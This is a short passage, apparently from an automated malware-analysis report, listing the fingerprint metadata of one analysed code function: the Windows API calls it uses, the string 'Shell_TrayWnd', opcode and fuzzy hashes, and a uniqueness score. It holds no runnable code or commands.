                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: fd3bf77bd4edecb9e8c696050d8e34d7aec3dd52350d801c42c5cf08ce024b43
                                          • Instruction ID: 8045392fc2e695a8890c6b59cccdb03a07225d4fcea5dd817d7eb4cdaa533834
                                          • Opcode Fuzzy Hash: fd3bf77bd4edecb9e8c696050d8e34d7aec3dd52350d801c42c5cf08ce024b43
                                          • Instruction Fuzzy Hash: D1D0A932381310BAEA64A331AC0FFCA7A489B00B00F1009027205BA1D0C9A0A804CA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%